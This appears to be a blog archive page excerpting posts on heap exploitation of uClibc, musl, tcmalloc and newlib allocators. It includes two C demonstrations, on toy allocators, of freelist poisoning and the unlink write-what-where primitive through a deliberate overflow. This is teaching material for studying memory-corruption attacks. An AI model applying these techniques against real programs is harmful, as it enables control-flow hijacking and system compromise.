Showing posts from December, 2019

Freelist Heap Exploitation on Docker Alpine Linux Images

Introduction In this blog post, I'll look at two attacks on Alpine Linux, which is commonly used as a base for Docker images. Both attacks use freelist poisoning against the heap allocator. The difference is that the first attack targets uClibc's heap allocator, which is present in earlier releases of Alpine, and the second targets the current version of Alpine, which uses musl libc. I have written at great length about freelist poisoning, as seen in: The main feature of freelist poisoning is that an attacker is able to make malloc return an arbitrary pointer. Combine

Attacks on the TCMalloc Heap Allocator

Introduction TCMalloc is a well-known heap allocator written by Google. A number of attacks against tcmalloc are possible; a good presentation on tcmalloc was given in 2011. In this blog post, I'll give examples of three attacks, some of which are not well known. Freelist Poisoning In the following code, we make tc_malloc return an arbitrary pointer. This is another variant of freelist poisoning, which I have discussed at great length. For freelist poisoning details on other allocators, see:   Double Free In the following attack, which exploits a double free in tcmalloc, we convert the
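Both of the excerpts above (the Alpine uClibc/musl post and the tcmalloc post) rest on the same primitive: a free chunk stores the address of the next free chunk in its own first word, and malloc pops that word without checking it. The following is an added example built for this page, not code from either post and not tcmalloc, uClibc or musl code. It is a toy LIFO freelist with a constructed heap overflow, so the names (`toy_heap`, `toy_malloc`, `victim`) and the 32-byte chunk layout are assumptions; the real allocators differ in chunk layout and in whatever integrity checks they apply to the popped pointer, and this toy applies none.

```c
/* Added example: a toy LIFO singly-linked freelist, constructed to show the
 * mechanics of freelist poisoning. It is not tcmalloc, uClibc or musl code.
 * The one property modelled is that a free chunk keeps the address of the
 * next free chunk in its first word, and malloc trusts that word. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHUNK_SIZE 32   /* assumed chunk size for this toy */
#define NCHUNKS    4

struct toy_heap {
    unsigned char arena[NCHUNKS * CHUNK_SIZE]; /* chunks laid out back to back */
    void *free_head;                           /* head of the LIFO freelist */
};

/* Push every chunk onto the freelist so that chunk 0 is handed out first. */
static void toy_init(struct toy_heap *h)
{
    memset(h->arena, 0, sizeof h->arena);
    h->free_head = NULL;
    for (int i = NCHUNKS - 1; i >= 0; i--) {
        unsigned char *c = h->arena + i * CHUNK_SIZE;
        memcpy(c, &h->free_head, sizeof(void *)); /* chunk->next = old head */
        h->free_head = c;
    }
}

/* Pop the head chunk. The new head is read from the chunk itself, unchecked. */
static void *toy_malloc(struct toy_heap *h)
{
    void *c = h->free_head;
    if (c == NULL)
        return NULL;
    memcpy(&h->free_head, c, sizeof(void *));
    return c;
}

/* Push a chunk back: its first word becomes the next pointer. */
static void toy_free(struct toy_heap *h, void *c)
{
    memcpy(c, &h->free_head, sizeof(void *));
    h->free_head = c;
}

/* Hypothetical victim (constructed): stands in for a function pointer or
 * flag living outside the heap that the attacker wants to overwrite. */
static unsigned long victim = 0;

/* Returns 1 if a linear overflow out of chunk A into freed chunk B makes
 * the second malloc after it return the address of `victim`. */
static int freelist_poisoning_demo(void)
{
    struct toy_heap h;
    toy_init(&h);

    unsigned char *a = (unsigned char *)toy_malloc(&h); /* chunk 0 */
    unsigned char *b = (unsigned char *)toy_malloc(&h); /* chunk 1, right after a */
    toy_free(&h, b);                    /* b is now the head; b->next = chunk 2 */

    /* Constructed overflow: CHUNK_SIZE bytes of filler fill a, and the next
     * sizeof(void *) bytes land on b's stored next pointer. */
    void *target = &victim;
    unsigned char payload[CHUNK_SIZE + sizeof(void *)];
    memset(payload, 'A', CHUNK_SIZE);
    memcpy(payload + CHUNK_SIZE, &target, sizeof target);
    memcpy(a, payload, sizeof payload);  /* writes past the end of a, into b */

    void *first  = toy_malloc(&h);  /* returns b; head is now `target` */
    void *second = toy_malloc(&h);  /* returns target: the poisoned pointer */
    if (first != (void *)b || second != target)
        return 0;

    /* Whatever the program stores in its new "heap" object now lands on victim. */
    unsigned long value = 0x41414141UL;
    memcpy(second, &value, sizeof value);
    return victim == 0x41414141UL;
}

int main(void)
{
    printf("freelist poisoning: malloc returned &victim and the write landed: %s\n",
           freelist_poisoning_demo() ? "yes" : "no");
    return 0;
}
```

The sequence to notice is free(b), overflow from a into b's first word, then two allocations: the first returns b and loads the attacker's address as the new head, the second returns that address. Any allocator whose freelist "next" pointer lives inside the free chunk is exposed this way unless it validates the pointer before trusting it.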

Newlib Unlink Heap Exploitation

In this paper, I introduce the reader to a heap metadata corruption attack against the latest version of newlib, an allocator used in embedded systems. The unlink attack on heaps was first introduced by Solar Designer in 2000 and was the first generic heap exploitation technique made public. The same attack is possible in modern-day uClibc, and the attack in newlib is almost identical. In the unlink technique, an attacker corrupts the fd and bk pointers of a free chunk. In a subsequent malloc that recycles this chunk, the chunk is unlinked from its freelist via pointer manipulations, which gives the attacker a write-what-where primitive: the ability to write a value of their choosing to an address of their choosing. The attack takes its name from the unlink macro, the code that performs the pointer manipulation to remove the free chunk from the list. This macro is unchanged in newlib and is also called unlink.
Newlib Unlink Heap Exploitation.PDF
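To make the write-what-where concrete, here is an added example constructed for this page. It is not code from the paper and not newlib's source; the `unlink` macro below is the classic Doug Lea malloc form (newlib's allocator descends from dlmalloc, but treat this as a model), and `toy_take_chunk`, `hijacked_fnptr` and `fake_shellcode` are assumed stand-ins for malloc recycling a chunk, a pointer worth hijacking, and a writable payload buffer. The second function shows the caveat every practitioner hits: the macro performs two writes, so the "what" address is also written to, which is why real payloads start with a short jump over the clobbered slot.

```c
/* Added example: the unlink write-what-where, modelled on the classic
 * dlmalloc-style unlink macro. A reconstruction for illustration only. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Boundary-tagged free chunk: fd/bk link it into a doubly-linked bin. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* Classic unlink: remove P from its bin by stitching its neighbours together.
 * Neither pointer is validated, so both writes are attacker-controlled. */
#define unlink(P, BK, FD) do {   \
        FD = (P)->fd;            \
        BK = (P)->bk;            \
        FD->bk = BK;             \
        BK->fd = FD;             \
    } while (0)

/* Assumed stand-in for malloc recycling free chunk P out of a bin. */
static struct chunk *toy_take_chunk(struct chunk *p)
{
    struct chunk *bk, *fd;
    unlink(p, bk, fd);
    return p;
}

/* Hypothetical targets (constructed): a pointer the attacker wants to hijack,
 * and a writable buffer standing in for shellcode. */
static void *hijacked_fnptr = NULL;
static _Alignas(16) unsigned char fake_shellcode[32];

/* Corrupt P's fd/bk so that unlink performs *where = what, then let the
 * allocator "recycle" P. Returns 1 if hijacked_fnptr now points at what. */
static int unlink_attack(void)
{
    struct chunk p;                 /* the free chunk whose metadata was overwritten */
    uintptr_t where = (uintptr_t)&hijacked_fnptr;
    uintptr_t what  = (uintptr_t)fake_shellcode;

    memset(&p, 0, sizeof p);
    memset(fake_shellcode, 0x90, sizeof fake_shellcode);  /* NOP placeholder */

    /* FD->bk = BK stores BK at FD + offsetof(bk); pick FD so that is `where`. */
    p.fd = (struct chunk *)(where - offsetof(struct chunk, bk));
    /* BK is the value stored, i.e. `what`. */
    p.bk = (struct chunk *)what;

    toy_take_chunk(&p);

    void *observed;
    memcpy(&observed, &hijacked_fnptr, sizeof observed);
    return observed == (void *)what;
}

/* The price of the primitive: BK->fd = FD also stores FD at what + offsetof(fd).
 * Returns 1 if those bytes of the "shellcode" were clobbered by the unlink. */
static int unlink_side_effect(void)
{
    if (!unlink_attack())
        return 0;
    void *stored;
    memcpy(&stored, fake_shellcode + offsetof(struct chunk, fd), sizeof stored);
    return stored == (void *)((uintptr_t)&hijacked_fnptr - offsetof(struct chunk, bk));
}

int main(void)
{
    printf("unlink wrote what to where: %s\n", unlink_attack() ? "yes" : "no");
    printf("unlink also clobbered what+%zu: %s\n", offsetof(struct chunk, fd),
           unlink_side_effect() ? "yes" : "no");
    return 0;
}
```

The two lines of arithmetic are the whole attack: fd is set to `where - offsetof(bk)` so that `FD->bk = BK` lands on the target, and bk is set to `what`. Because `BK->fd = FD` then writes into `what + offsetof(fd)`, the target of the write must itself be writable memory, and a payload placed there has to skip over that slot.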